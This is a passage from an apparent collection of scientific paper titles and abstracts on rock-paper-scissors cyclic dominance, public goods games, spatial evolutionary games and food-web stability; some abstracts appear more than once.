dynamics. --- paper_title: Volunteering leads to rock–paper–scissors dynamics in a public goods game paper_content: Collective efforts are a trademark of both insect and human societies1. They are achieved through relatedness in the former2 and unknown mechanisms in the latter. The problem of achieving cooperation among non-kin has been described as the ‘tragedy of the commons’, prophesying the inescapable collapse of many human enterprises3,4. In public goods experiments, initial cooperation usually drops quickly to almost zero5. It can be maintained by the opportunity to punish defectors6 or the need to maintain good reputation7. Both schemes require that defectors are identified. Theorists propose that a simple but effective mechanism operates under full anonymity. With optional participation in the public goods game, ‘loners’ (players who do not join the group), defectors and cooperators will coexist through rock–paper–scissors dynamics8,9. Here we show experimentally that volunteering generates these dynamics in public goods games and that manipulating initial conditions can produce each predicted direction. If, by manipulating displayed decisions, it is pretended that defectors have the highest frequency, loners soon become most frequent, as do cooperators after loners and defectors after cooperators. On average, cooperation is perpetuated at a substantial level. --- paper_title: Spatial prisoner's dilemma game with volunteering in Newman-Watts small-world networks. paper_content: A modified spatial prisoner's dilemma game with voluntary participation in Newman-Watts small-world networks is studied. Some reasonable ingredients are introduced to the game evolutionary dynamics: each agent in the network is a pure strategist and can only take one of three strategies (cooperator, defector, and loner); its strategical transformation is associated with both the number of strategical states and the magnitude of average profits, which are adopted and acquired by its coplayers in the previous round of play; a stochastic strategy mutation is applied when it gets into the trouble of local commons that the agent and its neighbors are in the same state and get the same average payoffs. In the case of very low temptation to defect, it is found that agents are willing to participate in the game in typical small-world region and intensive collective oscillations arise in more random region. --- paper_title: The Joker effect: cooperation driven by destructive agents paper_content: Abstract Understanding the emergence of cooperation is a central issue in evolutionary game theory. The hardest setup for the attainment of cooperation in a population of individuals is the Public Goods game in which cooperative agents generate a common good at their own expenses, while defectors “free-ride” this good. Eventually this causes the exhaustion of the good, a situation which is bad for everybody. Previous results have shown that introducing reputation, allowing for volunteer participation, punishing defectors, rewarding cooperators or structuring agents, can enhance cooperation. Here we present a model which shows how the introduction of rare, malicious agents – that we term jokers – performing just destructive actions on the other agents induce bursts of cooperation. The appearance of jokers promotes a rock-paper-scissors dynamics, where jokers outbeat defectors and cooperators outperform jokers, which are subsequently invaded by defectors. Thus, paradoxically, the existence of destructive agents acting indiscriminately promotes cooperation. --- paper_title: Phase transitions for rock-scissors-paper game on different networks. paper_content: Monte Carlo simulations and dynamical mean-field approximations are performed to study the phase transitions in the rock-scissors-paper game on different host networks. These graphs are originated from lattices by introducing quenched and annealed randomness simultaneously. In the resulting phase diagrams three different stationary states are identified for all structures. The comparison of results on different networks suggests that the value of the clustering coefficient plays an irrelevant role in the emergence of a global oscillating phase. The critical behavior of phase transitions seems to be universal and can be described by the same exponents. --- paper_title: Rock-scissors-paper game on regular small-world networks paper_content: The spatial rock-scissors-paper game (or cyclic Lotka–Volterra system) is extended to study how the spatiotemporal patterns are affected by the rewired host lattice providing uniform number of neighbours (degree) at each site. On the square lattice this system exhibits a self-organizing pattern with equal concentration of the competing strategies (species). If the quenched background is constructed by substituting random links for the nearest-neighbour bonds of a square lattice then a limit cycle occurs when the portion of random links exceeds a threshold value. This transition can also be observed if the standard link is replaced temporarily by a random one with a probability P at each step of iteration. Above a second threshold value of P the amplitude of global oscillation increases with time and finally the system reaches one of the homogeneous (absorbing) states. In this case the results of Monte Carlo simulations are compared with the predictions of the dynamical cluster technique evaluating all the configuration probabilities on one-, two-, four- and six-site clusters. --- paper_title: Cooperation for volunteering and partially random partnerships paper_content: Competition among cooperative, defective, and loner strategies is studied by considering an evolutionary prisoner's dilemma game for different partnerships. In this game each player can adopt one of its coplayer's strategy with a probability depending on the difference of payoffs coming from games with the corresponding coplayers. Our attention is focused on the effects of annealed and quenched randomness in the partnership for fixed number of coplayers. It is shown that only the loners survive if the four coplayers are chosen randomly (mean-field limit). On the contrary, on the square lattice all the three strategies are maintained by the cyclic invasions resulting in a self-organizing spatial pattern. If the fixed partnership is described by a regular small-world structure then a homogeneous oscillation occurs in the population dynamics when the measure of quenched randomness exceeds a threshold value. Similar behavior with higher sensitivity to the randomness is found if temporary partners are substituted for the standard ones with some probability at each step of iteration. --- paper_title: Phase transitions and volunteering in spatial public goods games. paper_content: We present a simple yet effective mechanism promoting cooperation under full anonymity by allowing for voluntary participation in public goods games. This natural extension leads to "rock-scissors-paper"-type cyclic dominance of the three strategies, cooperate, defect, and loner. In spatial settings with players arranged on a regular lattice, this results in interesting dynamical properties and intriguing spatiotemporal patterns. In particular, variations of the value of the public good leads to transitions between one-, two-, and three-strategy states which either are in the class of directed percolation or show interesting analogies to Ising-type models. Although volunteering is incapable of stabilizing cooperation, it efficiently prevents successful spreading of selfish behavior. --- paper_title: Stability and robustness analysis of cooperation cycles driven by destructive agents in finite populations paper_content: The emergence and promotion of cooperation are two of the main issues in evolutionary game theory, as cooperation is amenable to exploitation by defectors, which take advantage of cooperative individuals at no cost, dooming them to extinction. It has been recently shown that the existence of purely destructive agents (termed jokers) acting on the common enterprises (public goods games) can induce stable limit cycles among cooperation, defection, and destruction when infinite populations are considered. These cycles allow for time lapses in which cooperators represent a relevant fraction of the population, providing a mechanism for the emergence of cooperative states in nature and human societies. Here we study analytically and through agent-based simulations the dynamics generated by jokers in finite populations for several selection rules. Cycles appear in all cases studied, thus showing that the joker dynamics generically yields a robust cyclic behavior not restricted to infinite populations. We also compute the average time in which the population consists mostly of just one strategy and compare the results with numerical simulations. --- paper_title: Phase diagrams for the spatial public goods game with pool-punishment paper_content: The efficiency of institutionalized punishment is studied by evaluating the stationary states in the spatial public goods game comprising unconditional defectors, cooperators, and cooperating pool punishers as the three competing strategies. Fines and costs of pool punishment are considered as the two main parameters determining the stationary distributions of strategies on the square lattice. Each player collects a payoff from five five-person public goods games, and the evolution of strategies is subsequently governed by imitation based on pairwise comparisons at a low level of noise. The impact of pool punishment on the evolution of cooperation in structured populations is significantly different from that reported previously for peer punishment. Representative phase diagrams reveal remarkably rich behavior, depending also on the value of the synergy factor that characterizes the efficiency of investments payed into the common pool. Besides traditional single- and two-strategy stationary states, a rock-paper-scissors type of cyclic dominance can emerge in strikingly different ways. --- paper_title: The Economics of Fair Play. paper_content: Imagine that somebody offers you $100. All you have to do is agree with some other anonymous person on how to share the sum. The rules are strict. The two of you are in separate rooms and cannot exchange information. A coin toss decides which of you will propose how to share the money. Suppose that you are the proposer. You can make a single offer of how to split the sum, and the other person-the responder-can say yes or no. The responder also knows the rules and the total amount of money at stake. If her answer is yes, the deal goes ahead. If her answer is no, neither of you gets anything. In both cases, the game is over and will not be repeated. What will you do? ::: ::: Instinctively, many people feel they should offer 50 percent, because such a division is "fair" and therefore likely to be accepted. More daring people, however, think they might get away with offering somewhat less than half of the sum. --- paper_title: Defense mechanisms of empathetic players in the spatial ultimatum game paper_content: Experiments on the ultimatum game have revealed that humans are remarkably fond of fair play. When asked to share an amount of money, unfair offers are rare and their acceptance rate small. While empathy and spatiality may lead to the evolution of fairness, thus far considered continuous strategies have precluded the observation of solutions that would be driven by pattern formation. Here we introduce a spatial ultimatum game with discrete strategies, and we show that this simple alteration opens the gate to fascinatingly rich dynamical behavior. In addition to mixed stationary states, we report the occurrence of traveling waves and cyclic dominance, where one strategy in the cycle can be an alliance of two strategies. The highly webbed phase diagram, entailing continuous and discontinuous phase transitions, reveals hidden complexity in the pursuit of human fair play. --- paper_title: Evolutionary conservation of species' roles in food webs. paper_content: Studies of ecological networks (the web of interactions between species in a community) demonstrate an intricate link between a community's structure and its long-term viability. It remains unclear, however, how much a community's persistence depends on the identities of the species present, or how much the role played by each species varies as a function of the community in which it is found. We measured species' roles by studying how species are embedded within the overall network and the subsequent dynamic implications. Using data from 32 empirical food webs, we find that species' roles and dynamic importance are inherent species attributes and can be extrapolated across communities on the basis of taxonomic classification alone. Our results illustrate the variability of roles across species and communities and the relative importance of distinct species groups when attempting to conserve ecological communities. --- paper_title: Spirals and coarsening patterns in the competition of many species: A complex Ginzburg-Landau approach paper_content: In order to model real ecological systems one has to consider many species that interact in complex ways. However, most of the recent theoretical studies have been restricted to few species systems with rather trivial interactions. The few studies dealing with larger number of species and/or more complex interaction schemes are mostly restricted to numerical explorations. In this paper we determine, starting from the deterministic mean-field rate equations, for large classes of systems the space of coexistence fixed points at which biodiversity is maximal. For systems with a single coexistence fixed point we derive complex Ginzburg–Landau equations that allow to describe space-time pattern realized in two space dimensions. For selected cases we compare the theoretical predictions with the pattern observed in numerical simulations. --- paper_title: Globally synchronized oscillations in complex cyclic games paper_content: The rock-paper-scissors game and its generalizations with S>3 species are well-studied models for cyclically interacting populations. Four is, however, the minimum number of species that, by allowing other interactions beyond the single, cyclic loop, breaks both the full intransitivity of the food graph and the one-predator, one-prey symmetry. Lütz et al. [J. Theor. Biol. 317, 286 (2013)] have shown the existence, on a square lattice, of two distinct phases, with either four or three coexisting species. In both phases, each agent is eventually replaced by one of its predators, but these strategy oscillations remain localized as long as the interactions are short ranged. Distant regions may be either out of phase or cycling through different food-web subloops (if any). Here we show that upon replacing a minimum fraction Q of the short-range interactions by long-range ones, there is a Hopf bifurcation, and global oscillations become stable. Surprisingly, to build such long-distance, global synchronization, the four-species coexistence phase requires fewer long-range interactions than the three-species phase, while one would naively expect the opposite to be true. Moreover, deviations from highly homogeneous conditions (χ=0 or 1) increase Qc, and the more heterogeneous is the food web, the harder the synchronization is. By further increasing Q, while the three-species phase remains stable, the four-species one has a transition to an absorbing, single-species state. The existence of a phase with global oscillations for S>3, when the interaction graph has multiple subloops and several possible local cycles, leads to the conjecture that global oscillations are a general characteristic, even for large, realistic food webs. --- paper_title: Competing associations in six-species predator-prey models paper_content: We study a set of six-species ecological models where each species has two predators and two prey. On a square lattice the time evolution is governed by iterated invasions between the neighbouring predator–prey pairs chosen at random and by a site exchange with a probability Xs between the neutral pairs. These models involve the possibility of spontaneous formation of different defensive alliances whose members protect each other from the external invaders. The Monte Carlo simulations show a surprisingly rich variety of the stable spatial distributions of species and subsequent phase transitions when tuning the control parameter Xs. These very simple models are able to demonstrate that the competition between these associations influences their composition. Sometimes the dominant association is developed via a domain growth. In other cases larger and larger invasion processes precede the prevalence of one of the stable associations. Under some conditions the survival of all the species can be maintained by the cyclic dominance occurring between these associations. --- paper_title: Network structure, predator–prey modules, and stability in large food webs paper_content: Large, complex networks of ecological interactions with random structure tend invariably to instability. This mathematical relationship between complexity and local stability ignited a debate that has populated ecological literature for more than three decades. Here we show that, when species interact as predators and prey, systems as complex as the ones observed in nature can still be stable. Moreover, stability is highly robust to perturbations of interaction strength, and is largely a property of structure driven by predator–prey loops with the stability of these small modules cascading into that of the whole network. These results apply to empirical food webs and models that mimic the structure of natural systems as well. These findings are also robust to the inclusion of other types of ecological links, such as mutualism and interference competition, as long as consumer–resource interactions predominate. These considerations underscore the influence of food web structure on ecological dynamics and challenge the current view of interaction strength and long cycles as main drivers of stability in natural communities. --- paper_title: Fixation in a cyclic Lotka-Volterra model paper_content: We study a cyclic Lotka-Volterra model of N interacting species populating a d-dimensional lattice. In the realm of a Kirkwood approximation, a critical number of species N_c(d) above which the system fixates is determined analytically. We find N_c=5,14,23 in dimensions d=1,2,3, in remarkably good agreement with simulation results in two dimensions. --- paper_title: Coexistence and Survival in Conservative Lotka-Volterra Networks paper_content: Analyzing coexistence and survival scenarios of Lotka-Volterra (LV) networks in which the total biomass is conserved is of vital importance for the characterization of long-term dynamics of ecological communities. Here, we introduce a classification scheme for coexistence scenarios in these conservative LV models and quantify the extinction process by employing the Pfaffian of the network's interaction matrix. We illustrate our findings on global stability properties for general systems of four and five species and find a generalized scaling law for the extinction time. --- paper_title: A competitive network theory of species diversity. paper_content: Nonhierarchical competition between species has been proposed as a potential mechanism for biodiversity maintenance, but theoretical and empirical research has thus far concentrated on systems composed of relatively few species. Here we develop a theory of biodiversity based on a network representation of competition for systems with large numbers of competitors. All species pairs are connected by an arrow from the inferior to the superior. Using game theory, we show how the equilibrium density of all species can be derived from the structure of the network. We show that when species are limited by multiple factors, the coexistence of a large number of species is the most probable outcome and that habitat heterogeneity interacts with network structure to favor diversity. --- paper_title: Interaction strengths in food webs : issues and opportunities paper_content: Summary 1. Recent efforts to understand how the patterning of interaction strength affects both structure and dynamics in food webs have highlighted several obstacles to productive synthesis. Issues arise with respect to goals and driving questions, methods and approaches, and placing results in the context of broader ecological theory. 2. Much confusion stems from lack of clarity about whether the questions posed relate to community-level patterns or to species dynamics, and to what authors actually mean by the term ‘interaction strength’. Here, we describe the various ways in which this term has been applied and discuss the implications of loose terminology and definition for the development of this field. 3. Of particular concern is the clear gap between theoretical and empirical investigations of interaction strengths and food web dynamics. The ecological community urgently needs to explore new ways to estimate biologically reasonable model coefficients from empirical data, such as foraging rates, body size, metabolic rate, biomass distribution and other species traits. 4. Combining numerical and analytical modelling approaches should allow exploration of the conditions under which different interaction strengths metrics are interchangeable with regard to relative magnitude, system responses, and species identity. 5. Finally, the prime focus on predator‐prey links in much of the research to date on interaction strengths in food webs has meant that the potential significance of nontrophic interactions, such as competition, facilitation and biotic disturbance, has been largely ignored by the food web community. Such interactions may be important dynamically and should be routinely included in future food web research programmes. --- paper_title: A General Model for Food Web Structure paper_content: A central problem in ecology is determining the processes that shape the complex networks known as food webs formed by species and their feeding relationships. The topology of these networks is a major determinant of ecosystems' dynamics and is ultimately responsible for their responses to human impacts. Several simple models have been proposed for the intricate food webs observed in nature. We show that the three main models proposed so far fail to fully replicate the empirical data, and we develop a likelihood-based approach for the direct comparison of alternative models based on the full structure of the network. Results drive a new model that is able to generate all the empirical data sets and to do so with the highest likelihood. --- paper_title: Defensive alliances in spatial models of cyclical population interactions paper_content: As a generalization of the three-strategy Rock-Scissors-Paper game dynamics in space, cyclical interaction models of six mutating species are studied on a square lattice, in which each species is supposed to have two dominant, two subordinated, and a neutral interacting partner. Depending on their interaction topologies, all imaginable systems can be classified into four (isomorphic) groups exhibiting significantly different behaviors as a function of mutation rate. In three out of four cases three (or four) species form defensive alliances that maintain themselves in a self-organizing polydomain structure via cyclic invasions. Varying the mutation rate, this mechanism results in an ordering phenomenon analogous to that of magnetic Ising systems. The model explains a very basic mechanism of community organization, which might gain important applications in biology, economics, and sociology. --- paper_title: Extinction in four species cyclic competition paper_content: When four species compete stochastically in a cyclic way, the formation of two teams of mutually neutral partners is observed. In this paper we study through numerical simulations the extinction processes that can take place in this system both in the well mixed case as well as on different types of lattices. The different routes to extinction are revealed by the probability distribution of the domination time, i.e.?the time needed for one team to fully occupy the system. If swapping is allowed between neutral partners, then the probability distribution is dominated by very long-lived states where a few very large domains persist, each domain being occupied by a mix of individuals from species that form one of the teams. Many aspects of the possible extinction scenarios are lost when only considering averaged quantities, such as for example the mean domination time. --- paper_title: Globally synchronized oscillations in complex cyclic games paper_content: The rock-paper-scissors game and its generalizations with S>3 species are well-studied models for cyclically interacting populations. Four is, however, the minimum number of species that, by allowing other interactions beyond the single, cyclic loop, breaks both the full intransitivity of the food graph and the one-predator, one-prey symmetry. Lütz et al. [J. Theor. Biol. 317, 286 (2013)] have shown the existence, on a square lattice, of two distinct phases, with either four or three coexisting species. In both phases, each agent is eventually replaced by one of its predators, but these strategy oscillations remain localized as long as the interactions are short ranged. Distant regions may be either out of phase or cycling through different food-web subloops (if any). Here we show that upon replacing a minimum fraction Q of the short-range interactions by long-range ones, there is a Hopf bifurcation, and global oscillations become stable. Surprisingly, to build such long-distance, global synchronization, the four-species coexistence phase requires fewer long-range interactions than the three-species phase, while one would naively expect the opposite to be true. Moreover, deviations from highly homogeneous conditions (χ=0 or 1) increase Qc, and the more heterogeneous is the food web, the harder the synchronization is. By further increasing Q, while the three-species phase remains stable, the four-species one has a transition to an absorbing, single-species state. The existence of a phase with global oscillations for S>3, when the interaction graph has multiple subloops and several possible local cycles, leads to the conjecture that global oscillations are a general characteristic, even for large, realistic food webs. --- paper_title: Three- and four-state rock-paper-scissors games with diffusion paper_content: Cyclic dominance of three species is a commonly occurring interaction dynamics, often denoted the rock-paper-scissors (RPS) game. Such a type of interactions is known to promote species coexistence. Here, we generalize recent results of Reichenbach [Nature (London) 448, 1046 (2007)] of a four-state variant of the RPS game. We show that spiral formation takes place only without a conservation law for the total density. Nevertheless, in general, fast diffusion can destroy species coexistence. We also generalize the four-state model to slightly varying reaction rates. This is shown both analytically and numerically not to change pattern formation, or the effective wavelength of the spirals, and therefore not to alter the qualitative properties of the crossover to extinction. --- paper_title: Cyclic competition of four species: mean field theory and stochastic evolution paper_content: Generalizing the cyclically competing three-species model (often referred to as the rock-paper-scissors game), we consider a simple system of population dynamics without spatial structures that involves four species. Unlike the previous model, the four form alliance pairs which resemble partnership in the game of Bridge. In a finite system with discrete stochastic dynamics, all but 4 of the absorbing states consist of coexistence of a partner-pair. From a master equation, we derive a set of mean field equations of evolution. This approach predicts complex time dependence of the system and that the surviving partner-pair is the one with the larger product of their strengths (rates of consumption). Simulations typically confirm these scenarios. Beyond that, much richer behavior is revealed, including complicated extinction probabilities and non-trivial distributions of the population ratio in the surviving pair. These discoveries naturally raise a number of intriguing questions, which in turn suggests a variety of future avenues of research, especially for more realistic models of multispecies competition in nature. --- paper_title: Cyclic competition of four species: domains and interfaces paper_content: We study numerically domain growth and interface fluctuations in one- and two-dimensional lattice systems composed of four species that interact in a cyclic way. Particle mobility is implemented through exchanges of particles located on neighboring lattice sites. For the chain we find that the details of the domain growth strongly depend on the mobility, with a higher mobility yielding a larger effective domain growth exponent. In two space dimensions, when also exchanges between mutually neutral particles are possible, both domain growth and interface fluctuations display universal regimes that are independent of the predation and exchange rates. --- paper_title: Coexistence and Survival in Conservative Lotka-Volterra Networks paper_content: Analyzing coexistence and survival scenarios of Lotka-Volterra (LV) networks in which the total biomass is conserved is of vital importance for the characterization of long-term dynamics of ecological communities. Here, we introduce a classification scheme for coexistence scenarios in these conservative LV models and quantify the extinction process by employing the Pfaffian of the network's interaction matrix. We illustrate our findings on global stability properties for general systems of four and five species and find a generalized scaling law for the extinction time. --- paper_title: Theory of phase ordering kinetics paper_content: The theory of phase ordering kinetics is reviewed, and new results for systems with continuous symmetry presented. A generalisation of “Porod's law” for the tail of the structure factor, of the form S(k, t) ∼ k−(d+n)L(t)−n for kL(t) ≫ 1, where L(t) is the characteristic length scale at time t after the quench, is derived where, for a vector order parameter, n is simply the number of components of the vector. The power-law tail is shown to be associated with topological defects in the field, and its amplitude is calculated exactly in terms of the defect density. For a conserved vector order parameter the multiscaling form obtained for n = ∞ is argued to be special to this limit. Using an approximate theory due to Mazenko, it is shown that conventional scaling is recovered, for any finite n, when t→∞, with L(t)∼ (tln n)14 for n large. --- paper_title: Saddles, Arrows, and Spirals: Deterministic Trajectories in Cyclic Competition of Four Species paper_content: Population dynamics in systems composed of cyclically competing species has been of increasing interest recently. Here we investigate a system with four or more species. Using mean field theory, we study in detail the trajectories in configuration space of the population fractions. We discover a variety of orbits, shaped like saddles, spirals, and straight lines. Many of their properties are found explicitly. Most remarkably, we identify a collective variable that evolves simply as an exponential: Q ∝ e(λt), where λ is a function of the reaction rates. It provides information on the state of the system for late times (as well as for t→-∞). We discuss implications of these results for the evolution of a finite, stochastic system. A generalization to an arbitrary number of cyclically competing species yields valuable insights into universal properties of such systems. --- paper_title: Intransitivity and coexistence in four species cyclic games paper_content: Intransitivity is a property of connected, oriented graphs representing species interactions that may drive their coexistence even in the presence of competition, the standard example being the three species Rock-Paper-Scissors game. We consider here a generalization with four species, the minimum number of species allowing other interactions beyond the single loop (one predator, one prey). We show that, contrary to the mean field prediction, on a square lattice the model presents a transition, as the parameter setting the rate at which one species invades another changes, from a coexistence to a state in which one species gets extinct. Such a dependence on the invasion rates shows that the interaction graph structure alone is not enough to predict the outcome of such models. In addition, different invasion rates permit to tune the level of transitiveness, indicating that for the coexistence of all species to persist, there must be a minimum amount of intransitivity. --- paper_title: Phase transitions induced by variation of invasion rates in spatial cyclic predator-prey models with four or six species paper_content: Cyclic predator-prey models with four or six species are studied on a square lattice when the invasion rates are varied. It is found that the cyclic invasions maintain a self-organizing pattern as long as the deviation of the invasion rate(s) from a uniform value does not exceed a threshold value. For larger deviations the system exhibits a continuous phase transition into a frozen distribution of odd (or even) label species. --- paper_title: From pairwise to group interactions in games of cyclic dominance paper_content: We study the rock-paper-scissors game in structured populations, where the invasion rates determine individual payoffs that govern the process of strategy change. The traditional version of the game is recovered if the payoffs for each potential invasion stem from a single pairwise interaction. However, the transformation of invasion rates to payoffs also allows the usage of larger interaction ranges. In addition to the traditional pairwise interaction, we therefore consider simultaneous interactions with all nearest neighbors, as well as with all nearest and next-nearest neighbors, thus effectively going from single pair to group interactions in games of cyclic dominance. We show that differences in the interaction range affect not only the stationary fractions of strategies, but also their relations of dominance. The transition from pairwise to group interactions can thus decelerate and even revert the direction of the invasion between the competing strategies. Like in evolutionary social dilemmas, in games of cyclic dominance too the indirect multipoint interactions that are due to group interactions hence play a pivotal role. Our results indicate that, in addition to the invasion rates, the interaction range is at least as important for the maintenance of biodiversity among cyclically competing strategies. --- paper_title: Mobility-Dependent Selection of Competing Strategy Associations paper_content: Standard models of population dynamics focus on the interaction, survival, and extinction of the competing species individually. Real ecological systems, however, are characterized by an abundance of species (or strategies, in the terminology of evolutionary-game theory) that form intricate, complex interaction networks. The description of the ensuing dynamics may be aided by studying associations of certain strategies rather than individual ones. Here we show how such a higher-level description can bear fruitful insight. Motivated from different strains of colicinogenic Escherichia coli bacteria, we investigate a four-strategy system which contains a three-strategy cycle and a neutral alliance of two strategies. We find that the stochastic, spatial model exhibits a mobility-dependent selection of either the three-strategy cycle or of the neutral pair. We analyze this intriguing phenomenon numerically and analytically. --- paper_title: Diverging fluctuations in a spatial five-species cyclic dominance game paper_content: A five-species predator-prey model is studied on a square lattice where each species has two prey and two predators on the analogy to the rock-paper-scissors-lizard-Spock game. The evolution of the spatial distribution of species is governed by site exchange and invasion between the neighboring predator-prey pairs, where the cyclic symmetry can be characterized by two different invasion rates. The mean-field analysis has indicated periodic oscillations in the species densities with a frequency becoming zero for a specific ratio of invasion rates. When varying the ratio of invasion rates, the appearance of this zero-eigenvalue mode is accompanied by neutrality between the species associations. Monte Carlo simulations of the spatial system reveal diverging fluctuations at a specific invasion rate, which can be related to the vanishing dominance between all pairs of species associations. --- paper_title: Spatial coherence resonance in excitable media paper_content: We study the phenomenon of spatial coherence resonance in a two-dimensional model of excitable media with FitzHugh-Nagumo local dynamics. In particular, we show that there exists an optimal level of additive noise for which an inherent spatial scale of the excitable media is best pronounced. We argue that the observed phenomenon occurs due to the existence of a noise robust excursion time that is characteristic for the local dynamics whereby the diffusion constant, representing the rate of diffusive spread, determines the actual resonant spatial frequency. Additionally, biological implications of presented results in the field of neuroscience are outlined. --- paper_title: Mobility promotes and jeopardizes biodiversity in rock-paper-scissors games paper_content: Biodiversity is essential to the viability of ecological systems. Species diversity in ecosystems is promoted by cyclic, non-hierarchical interactions among competing populations. Such non-transitive relations lead to an evolution with central features represented by the `rock-paper-scissors' game, where rock crushes scissors, scissors cut paper, and paper wraps rock. In combination with spatial dispersal of static populations, this type of competition results in the stable coexistence of all species and the long-term maintenance of biodiversity. However, population mobility is a central feature of real ecosystems: animals migrate, bacteria run and tumble. Here, we observe a critical influence of mobility on species diversity. When mobility exceeds a certain value, biodiversity is jeopardized and lost. In contrast, below this critical threshold all subpopulations coexist and an entanglement of travelling spiral waves forms in the course of temporal evolution. We establish that this phenomenon is robust, it does not depend on the details of cyclic competition or spatial environment. These findings have important implications for maintenance and evolution of ecological systems and are relevant for the formation and propagation of patterns in excitable media, such as chemical kinetics or epidemic outbreaks. --- paper_title: Evolutionary dynamics of group interactions on structured populations: A review paper_content: Interactions among living organisms, from bacteria colonies to human societies, are inherently more complex than interactions among particles and non-living matter. Group interactions are a particularly important and widespread class, representative of which is the public goods game. In addition, methods of statistical physics have proved valuable for studying pattern formation, equilibrium selection and self-organization in evolutionary games. Here, we review recent advances in the study of evolutionary dynamics of group interactions on top of structured populations, including lattices, complex networks and coevolutionary models. We also compare these results with those obtained on well-mixed populations. The review particularly highlights that the study of the dynamics of group interactions, like several other important equilibrium and non-equilibrium dynamical processes in biological, economical and social sciences, benefits from the synergy between statistical physics, network science and evolutionary game theory. --- paper_title: Competing associations in six-species predator-prey models paper_content: We study a set of six-species ecological models where each species has two predators and two prey. On a square lattice the time evolution is governed by iterated invasions between the neighbouring predator–prey pairs chosen at random and by a site exchange with a probability Xs between the neutral pairs. These models involve the possibility of spontaneous formation of different defensive alliances whose members protect each other from the external invaders. The Monte Carlo simulations show a surprisingly rich variety of the stable spatial distributions of species and subsequent phase transitions when tuning the control parameter Xs. These very simple models are able to demonstrate that the competition between these associations influences their composition. Sometimes the dominant association is developed via a domain growth. In other cases larger and larger invasion processes precede the prevalence of one of the stable associations. Under some conditions the survival of all the species can be maintained by the cyclic dominance occurring between these associations. --- paper_title: Critical coarsening without surface tension: the universality class of the voter model. paper_content: We show that the two-dimensional voter model, usually considered to be only a marginal coarsening system, represents a broad class of models for which phase ordering takes place without surface tension. We argue that voter-like growth is generically observed at order-disorder nonequilibrium transitions solely driven by interfacial noise between dynamically symmetric absorbing states. --- paper_title: Cyclical interactions with alliance-specific heterogeneous invasion rates paper_content: We study a six-species Lotka-Volterra-type system on different two-dimensional lattices when each species has two superior and two inferior partners. The invasion rates from predator sites to a randomly chosen neighboring prey site depend on the predator-prey pair, whereby cyclic symmetries within the two three-species defensive alliances are conserved. Monte Carlo simulations reveal an unexpected nonmonotonous dependence of alliance survival on the difference of alliance-specific invasion rates. This behavior is qualitatively reproduced by a four-point mean-field approximation. The study addresses fundamental problems of stability for the competition of two defensive alliances and thus has important implications in natural and social sciences. --- paper_title: Self-organizing patterns maintained by competing associations in a six-species predator-prey model paper_content: Formation and competition of associations are studied in a six-species ecological model where each species has two predators and two prey. Each site of a square lattice is occupied by an individual belonging to one of the six species. The evolution of the spatial distribution of species is governed by iterated invasions between the neighboring predator-prey pairs with species specific rates and by site exchange between the neutral pairs with a probability X . This dynamical rule yields the formation of five associations composed of two or three species with proper spatiotemporal patterns. For large X a cyclic dominance can occur between the three two-species associations whereas one of the two three-species associations prevails in the whole system for low values of X in the final state. Within an intermediate range of X all the five associations coexist due to the fact that cyclic invasions between the two-species associations reduce their resistance temporarily against the invasion of three-species associations. --- paper_title: Defensive alliances in spatial models of cyclical population interactions paper_content: As a generalization of the three-strategy Rock-Scissors-Paper game dynamics in space, cyclical interaction models of six mutating species are studied on a square lattice, in which each species is supposed to have two dominant, two subordinated, and a neutral interacting partner. Depending on their interaction topologies, all imaginable systems can be classified into four (isomorphic) groups exhibiting significantly different behaviors as a function of mutation rate. In three out of four cases three (or four) species form defensive alliances that maintain themselves in a self-organizing polydomain structure via cyclic invasions. Varying the mutation rate, this mechanism results in an ordering phenomenon analogous to that of magnetic Ising systems. The model explains a very basic mechanism of community organization, which might gain important applications in biology, economics, and sociology. --- paper_title: Noise-guided evolution within cyclical interactions paper_content: We study a stochastic predator–prey model on a square lattice, where each of the six species has two superior and two inferior partners. The invasion probabilities between species depend on the predator–prey pair and are supplemented by Gaussian noise. Conditions are identified that warrant the largest impact of noise on the evolutionary process, and the results of Monte Carlo simulations are qualitatively reproduced by a four-point cluster dynamical mean-field approximation. The observed noise-guided evolution is deeply routed in short-range spatial correlations, which is supported by simulations on other host lattice topologies. Our findings are conceptually related to the coherence resonance phenomenon in dynamical systems via the mechanism of threshold duality. We also show that the introduced concept of noise-guided evolution via the exploitation of threshold duality is not limited to predator–prey cyclical interactions, but may apply to models of evolutionary game theory as well, thus indicating its applicability in several different fields of research. --- paper_title: Competing associations in bacterial warfare with two toxins paper_content: Simple combinations of common competitive mechanisms can easily result in cyclic competitive dominance relationships between species. The topological features of such competitive networks allow for complex spatial coexistence patterns. We investigate self-organization and coexistence in a lattice model, describing the spatial population dynamics of competing bacterial strains. With increasing diffusion rate the community of the nine possible toxicity/resistance types undergoes two phase transitions. Below a critical level of diffusion, the system exhibits expanding domains of three different defensive alliances, each consisting of three cyclically dominant species. Due to the neutral relationship between these alliances and the finite system size effect, ultimately only one of them remains. At large diffusion rates the system admits three coexisting domains, each containing mutually neutral species. Because of the cyclical dominance between these domains, a long term stable coexistence of all species is ensured. In the third phase at intermediate diffusion the spatial structure becomes even more complicated with domains of mutually neutral species persisting along the borders of defensive alliances. The study reveals that cyclic competitive relationships may produce a large variety of complex coexistence patterns, exhibiting common features of natural ecosystems, like hierarchical organization, phase transitions and sudden, large-scale fluctuations. --- paper_title: Coherence resonance in a spatial prisoner's dilemma game paper_content: We study effects of additive spatiotemporal random variations, introduced to the payoffs of a spatial prisoner's dilemma game, on the evolution of cooperation. In the absence of explicit payoff variations the system exhibits a phase transition from a mixed state of cooperators and defectors to a homogenous state of defectors belonging to the directed percolation universality class. By introducing nonzero random variations to the payoffs, this phase transition can be reverted in a resonance-like manner depending on the variance of noise, thus marking coherence resonance in the system. We argue that explicit random payoff variations present a viable mechanism that promotes cooperation for defection temptation values substantially exceeding the one marking the transition point to homogeneity by deterministic payoffs. --- paper_title: A golden point rule in rock–paper–scissors–lizard–spock game paper_content: We study a novel five-species system on two-dimensional lattices when each species have two superior and two inferior partners. Here we simplify the huge parameter space of predation probability to only two parameters. Both of Monte Carlo simulation and Mean Field Theory reveal that two of strategies may die out when the ratio of the two parameters is close to the golden point 0.618, and the remaining three strategies are provided a cyclic dominance system. --- paper_title: Competition of individual and institutional punishments in spatial public goods games paper_content: We have studied the evolution of strategies in spatial public goods games where both individual (peer) and institutional (pool) punishments are present beside unconditional defector and cooperator strategies. The evolution of strategy distribution is governed by imitation based on random sequential comparison of neighbors' payoff for a fixed level of noise. Using numerical simulations we have evaluated the strategy frequencies and phase diagrams when varying the synergy factor, punishment cost, and fine. Our attention is focused on two extreme cases describing all the relevant behaviors in such a complex system. According to our numerical data peer punishers prevail and control the system 